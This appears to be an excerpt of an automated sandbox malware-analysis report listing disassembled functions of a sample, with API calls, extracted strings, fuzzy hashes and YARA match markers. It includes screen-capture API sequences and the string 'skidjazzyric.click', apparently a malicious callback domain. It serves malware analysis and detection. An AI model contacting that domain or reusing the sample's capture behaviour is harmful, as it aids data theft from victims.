Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A

Function 004257E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D

Strings

=^"\, xrefs: 00425ABF
rp, xrefs: 00425834
)RSP, xrefs: 004259A1
B"@, xrefs: 00425818
`J/H, xrefs: 00425826

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$)RSP$=^"\$`J/H$rp
API String ID: 237503144-816972838
Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94

Function 0040D545 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

CoUninitialize.OLE32 ref: 0040D555

Strings

|qay, xrefs: 0040D641
?C*], xrefs: 0040D7A4
&W-Q, xrefs: 0040D7B9
9Y, xrefs: 0040D854
skidjazzyric.click, xrefs: 0040D90A
~wxH, xrefs: 0040D64F

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
API String ID: 3213364925-1525209810
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95

Function 0213D7AC Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 02166BE7: GetDC.USER32(00000000), ref: 02166BF0
Part of subcall function 02166BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02166C11
Part of subcall function 02166BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02166C21
Part of subcall function 02166BE7: DeleteObject.GDI32(00000000), ref: 02166C28
Part of subcall function 02166BE7: CreateCompatibleDC.GDI32(00000000), ref: 02166C37
Part of subcall function 02166BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02166C42
Part of subcall function 02166BE7: SelectObject.GDI32(00000000,00000000), ref: 02166C4E
Part of subcall function 02166BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02166C71

CoUninitialize.COMBASE ref: 0213D7BC

Strings

9Y, xrefs: 0213DABB
|qay, xrefs: 0213D8A8
~wxH, xrefs: 0213D8B6
skidjazzyric.click, xrefs: 0213DB71
?C*], xrefs: 0213DA0B
&W-Q, xrefs: 0213DA20

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
API String ID: 3248263802-1525209810
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: 4d996937e67107be7583d5bd0f11cf589042adf8d43c6782d465d1234c5f76a2
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: EEB116756447818BE726CF2AC8D0762BBE2FF96304B18C1ACC4D64FB4AD778A446CB51

Function 0041C400 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

C`6f, xrefs: 0041C73C, 0041CBB1, 0041CC7D
+P%V, xrefs: 0041C8FD
*H%N, xrefs: 0041C8EF
2T'Z, xrefs: 0041C904
4D"J, xrefs: 0041C8E8
,\/b, xrefs: 0041C912
C`6f, xrefs: 0041C919
,X0^, xrefs: 0041C90B

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5

Function 0214C667 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

,\/b, xrefs: 0214CB79
2T'Z, xrefs: 0214CB6B
4D"J, xrefs: 0214CB4F
+P%V, xrefs: 0214CB64
C`6f, xrefs: 0214CB80
*H%N, xrefs: 0214CB56
,X0^, xrefs: 0214CB72
C`6f, xrefs: 0214C9A3, 0214CE18, 0214CEE4

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction ID: 0d719960aefe33f8eccab292700c487a7ee2f871c274d9e6adc619a41167b4d8
Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction Fuzzy Hash: EE3238B19412118BCB24CF24C8927B7B7B2FF95318F28829DD8456F794EB75A902CBD1

Function 02138AE7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02138B0B
GetCurrentThreadId.KERNEL32 ref: 02138B15
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02138BBC
GetForegroundWindow.USER32 ref: 02138BD1
ExitProcess.KERNEL32 ref: 02138D1E

Strings

6W01, xrefs: 02138C1C

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction ID: d90e5dc77895b5b0f38803e6a81529f95584e548bbffaab41161a9a3b6b5a684
Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction Fuzzy Hash: E3517D73A843040FD728AF649C45356BAC79FC1314F1FC139A995AB3E5EA75880687C5

Function 00420D90 Relevance: 10.5, Strings: 8, Instructions: 470COMMON

Download Yara Rule

Strings

"G3A, xrefs: 00421026
?S2], xrefs: 00420F4E
<O)I, xrefs: 00420F36
%K9U, xrefs: 00420F3E
2W<Q, xrefs: 00420F46
>C;M"G3A, xrefs: 004211E3
?_%Y, xrefs: 00420F56
>C;M, xrefs: 00420F2E

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
API String ID: 0-2668584225
Opcode ID: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
Instruction ID: 1eff8263789fd2a08f3fecf0f268f16acf59bb1ac0ae24da522a1f75b62227ff
Opcode Fuzzy Hash: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
Instruction Fuzzy Hash: 28E101756083108BC324CF64C89276BB7F1EFE6314F498A5DE4D69B3A4E3389905CB96

Function 02150FF7 Relevance: 10.5, Strings: 8, Instructions: 470COMMON

Download Yara Rule

Strings

%K9U, xrefs: 021511A5
?S2], xrefs: 021511B5
2W<Q, xrefs: 021511AD
>C;M"G3A, xrefs: 0215144A
?_%Y, xrefs: 021511BD
<O)I, xrefs: 0215119D
"G3A, xrefs: 0215128D
>C;M, xrefs: 02151195

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
API String ID: 0-2668584225
Opcode ID: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
Instruction ID: cffbfb4312d4aca6b42af65a8d9ad58e11ee08d47241b9b3ec6d5f2acccaedd9
Opcode Fuzzy Hash: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
Instruction Fuzzy Hash: 7AE1E071548350CBC725DF64C89276BB7F2EF86324F198A5CE8E98B390E3749905CB92

Function 00427860 Relevance: 10.4, Strings: 8, Instructions: 409COMMON

Download Yara Rule

Strings

]_, xrefs: 004279C8
r}B, xrefs: 00427D60
J+, xrefs: 004279D3
JW, xrefs: 004279BD
+5, xrefs: 0042794C
/), xrefs: 00427944
3=, xrefs: 0042795C
bX_^, xrefs: 00427C10, 00427C14, 00427D78

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: J+$JW$]_$bX_^$r}B$+5$/)$3=
API String ID: 0-2499027453
Opcode ID: 929424e9da50b117192bea9d5fa077e9e13fbba52b5cd1fa525d3b1ff89fed60
Instruction ID: 44c300c69855992b2f16a9d4ad0dfeec6e614c77fc8171f72a5c7ce453eec0d9
Opcode Fuzzy Hash: 929424e9da50b117192bea9d5fa077e9e13fbba52b5cd1fa525d3b1ff89fed60
Instruction Fuzzy Hash: 9FD1DEB461C340DFE7249F25E881B6BB7A2FBC6304F94892DF1858B391DB749805CB5A

Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518COMMON

Download Yara Rule

Strings

6C(], xrefs: 0040B382
Bc*}, xrefs: 0040B3C6
fWpQ, xrefs: 0040B397
?_oY, xrefs: 0040B389
@w@q, xrefs: 0040B3E4
`/(), xrefs: 0040B588
K{Du, xrefs: 0040B3DA

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
API String ID: 0-74227037
Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

Function 004186FC Relevance: 8.5, Strings: 6, Instructions: 1000COMMON

Download Yara Rule

Strings

H)G+, xrefs: 00418852
NmNo, xrefs: 004188F5
<, xrefs: 0041913F
tu, xrefs: 00418829
]a_c, xrefs: 00418871
+, xrefs: 00418DD8

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: +$<$H)G+$NmNo$]a_c$tu
API String ID: 0-4096164410
Opcode ID: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
Instruction ID: c7a3f77f71ded0b9311dc6516a729683f4fb7c759b6558f4b3eb03d829b5ec1a
Opcode Fuzzy Hash: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
Instruction Fuzzy Hash: 925216741093509FD724CF28C8917ABB7E1FF86314F184A6DE4D68B391DB38A845CB9A

Function 0040AE30 Relevance: 7.8, Strings: 6, Instructions: 344COMMON

Download Yara Rule

Strings

8)*6, xrefs: 0040B0B0
}v, xrefs: 0040AED8
:33F, xrefs: 0040B0A4
8)*6, xrefs: 0040B229, 0040B064, 0040B232, 0040B1C3, 0040B1B7, 0040B25C, 0040B084, 0040B215
]f, xrefs: 0040B021, 0040B025
Ds, xrefs: 0040AEE8

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 8)*6$8)*6$:33F$Ds$]f$}v
API String ID: 0-771823803
Opcode ID: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
Instruction ID: 415c6ff438417329eae15ed8e7d658c137838348542c9c9b1d71c747cb23f456
Opcode Fuzzy Hash: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
Instruction Fuzzy Hash: 88B1F67520C3408BD324CF6884546AFBBE1EFD2304F18896DE8D56B391D779890ACB9E

Function 0213B097 Relevance: 7.8, Strings: 6, Instructions: 344COMMON

Download Yara Rule

Strings

Ds, xrefs: 0213B14F
]f, xrefs: 0213B288, 0213B28C
}v, xrefs: 0213B13F
8)*6, xrefs: 0213B2CB, 0213B41E, 0213B490, 0213B4C3, 0213B42A, 0213B2EB, 0213B499, 0213B47C
8)*6, xrefs: 0213B317
:33F, xrefs: 0213B30B

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: 8)*6$8)*6$:33F$Ds$]f$}v
API String ID: 0-771823803
Opcode ID: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
Instruction ID: a886baf098a2d38b88050e3689bb3f84f9185348e5fed3cbba4f2dc11697e0fe
Opcode Fuzzy Hash: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
Instruction Fuzzy Hash: D6B1397524C3508BD325CF6884507AFFBE2AFD2218F48892CE4D64B351E775C60ACB5A

Function 00425AF0 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

bX_^, xrefs: 00425BBD
=^"\, xrefs: 00425ABF
C@, xrefs: 00425C40
)RSP, xrefs: 004259A1
B:, xrefs: 00425C36
K3, xrefs: 00425C4A

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: )RSP$=^"\$B:$C@$K3$bX_^
API String ID: 0-3030200349
Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91

Function 0043F150 Relevance: 6.8, Strings: 5, Instructions: 524COMMON

Download Yara Rule

Strings

d5fg, xrefs: 0043F195, 0043F1B0
f, xrefs: 0043F3AD
S"(w, xrefs: 0043F220
S"(w, xrefs: 0043F44C
d5fg, xrefs: 0043F1EF

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: InitializeThunk
String ID: S"(w$S"(w$d5fg$d5fg$f
API String ID: 2994545307-2961185688
Opcode ID: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
Instruction ID: d96f39f5747abd94facca9cdfd6dc8715fedad9b00cb7f1fec3a1bbed5632043
Opcode Fuzzy Hash: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
Instruction Fuzzy Hash: E812C575A093519FC724CF18C880B2BB7E1AFC9314F18963EE8A4573A1D775DC098B9A

Function 0216F3B7 Relevance: 6.8, Strings: 5, Instructions: 524COMMON

Download Yara Rule

Strings

d5fg, xrefs: 0216F3FC, 0216F417
d5fg, xrefs: 0216F456
S"(w, xrefs: 0216F6B3
f, xrefs: 0216F614
S"(w, xrefs: 0216F487

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: S"(w$S"(w$d5fg$d5fg$f
API String ID: 0-2961185688
Opcode ID: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
Instruction ID: 006b03d8e09a364fa5d8552443c0f155c4fa80e54080b2f3e0896ab3507e9ae6
Opcode Fuzzy Hash: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
Instruction Fuzzy Hash: 9812F5756493519FC324CF18D884B3EB7E2AFC9318F18866CE4A6477A1D771E816CB82

Function 00428437 Relevance: 6.7, Strings: 5, Instructions: 469COMMON

Download Yara Rule

Strings

LMR|, xrefs: 00428848
J'N!, xrefs: 00428B3B
H}}C, xrefs: 00428850
vu~r, xrefs: 00428868
"#, xrefs: 00428B43

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: "#$H}}C$J'N!$LMR|$vu~r
API String ID: 0-1530353048
Opcode ID: 8f0a109eb01666b980d5d4ea6aa88c69ad077d8ae26429a0f6b9f90d2ad26799
Instruction ID: 7cb9c3f936be8fd3a75d1e4abfb2bd6291e29c03686ec294c1ddfd7f13708a2f
Opcode Fuzzy Hash: 8f0a109eb01666b980d5d4ea6aa88c69ad077d8ae26429a0f6b9f90d2ad26799
Instruction Fuzzy Hash: 0DE16CB5608351CFC7108F24A84126FB7E1AF96308F58487EE8C597342DB39DC05CB5A

Function 004042B0 Relevance: 6.7, Strings: 5, Instructions: 464COMMON

Download Yara Rule

Strings

), xrefs: 0040432D
IEND, xrefs: 0040478F
), xrefs: 00404337
IDAT, xrefs: 0040471B
IHDR, xrefs: 004046AC

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
Instruction ID: 257f26cc5f2a74aac9bf87ca9c2577b9cb81d69ed2dc1e03b5bd0bdbb9992778
Opcode Fuzzy Hash: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
Instruction Fuzzy Hash: C302E2B46083848FD704CF29D89176ABBE1EBC6304F14853EEA859B3D1D379D909CB96

Function 02134517 Relevance: 6.7, Strings: 5, Instructions: 464COMMON

Download Yara Rule

Strings

IDAT, xrefs: 02134982
), xrefs: 02134594
IEND, xrefs: 021349F6
IHDR, xrefs: 02134913
), xrefs: 0213459E

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
Instruction ID: 8e6d4bb32cb30192763ab4a68f17f9a86ee6ad894c6829c13deba2834ab42530
Opcode Fuzzy Hash: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
Instruction Fuzzy Hash: 770212746483848FE714CF28C89176BBBE2EFC6300F15866DE9858B391D375DA09CB96

Function 004092A0 Relevance: 6.7, Strings: 5, Instructions: 452COMMON

Download Yara Rule

Strings

!oW1, xrefs: 004093CA
C, xrefs: 0040960D
P, xrefs: 0040948B
#"2., xrefs: 004093C2
RRP\, xrefs: 0040973E

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: !oW1$#"2.$C$P$RRP\
API String ID: 0-2182630447
Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction ID: 099b8e97d4c783248d299f08155666f1876e613e1bac2d45a50adfc1c6749069
Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction Fuzzy Hash: B8C1167221C3918BD3258F29D49076BBFE2AFD3304F18896DE4D44B3C6D679890AC796

Function 02139507 Relevance: 6.7, Strings: 5, Instructions: 452COMMON

Download Yara Rule

Strings

P, xrefs: 021396F2
RRP\, xrefs: 021399A5
#"2., xrefs: 02139629
C, xrefs: 02139874
!oW1, xrefs: 02139631

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: !oW1$#"2.$C$P$RRP\
API String ID: 0-2182630447
Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction ID: 897cf8d110775c286b70a36ac95e566d1f574dccc8c852c96ada2349328878fb
Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction Fuzzy Hash: 5CC1077125C3918FD3258F29C49176BBFE2AFD3204F18896DE4D54B382D7B9850ACB92

Function 00429FE4 Relevance: 6.7, Strings: 5, Instructions: 437COMMON

Download Yara Rule

Strings

sf, xrefs: 0042A36B
lvhu, xrefs: 0042A34B
ooKv, xrefs: 0042A363
,fbV, xrefs: 0042A353
d~`}, xrefs: 0042A35B

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: ,fbV$d~`}$lvhu$ooKv$sf
API String ID: 0-4157365443
Opcode ID: d0a6585cca3ad9a47c54e6056bc46f80964016baf11be8ce0a27bf085c007181
Instruction ID: aaedd27545ab9ed709b9694aed24c663919bae5b675873c34d327438eaef385a
Opcode Fuzzy Hash: d0a6585cca3ad9a47c54e6056bc46f80964016baf11be8ce0a27bf085c007181
Instruction Fuzzy Hash: 14E139B15483518FD714CF24D8817ABB7E2AFD1304F48896DE9D587382E679E908C78B

Function 00409790 Relevance: 6.7, Strings: 5, Instructions: 415COMMON

Download Yara Rule

Strings

nz, xrefs: 004098E3
*+, xrefs: 00409B1E
{u, xrefs: 00409A7E
6D135015ECAF0672D0632DF0E28DC412, xrefs: 0040982C
kh, xrefs: 00409BE3

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: *+$6D135015ECAF0672D0632DF0E28DC412$kh$nz${u
API String ID: 0-4082600940
Opcode ID: 0a6dafd6ef2ba7b0d43a2a51019282152f096bc3ad18055503bec8102e7ee30b
Instruction ID: 1b29a9faac5300f3ffc5f62fe3d46617b85d137f0c3ce0abae63967b27c05819
Opcode Fuzzy Hash: 0a6dafd6ef2ba7b0d43a2a51019282152f096bc3ad18055503bec8102e7ee30b
Instruction Fuzzy Hash: 2AD103716087508BD724DF35C851BABBBE2EFC1318F18896DE4D59B392D638C809CB46

Function 021399F7 Relevance: 6.7, Strings: 5, Instructions: 415COMMON

Download Yara Rule

Strings

kh, xrefs: 02139E4A
{u, xrefs: 02139CE5
6D135015ECAF0672D0632DF0E28DC412, xrefs: 02139A93
*+, xrefs: 02139D85
nz, xrefs: 02139B4A

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

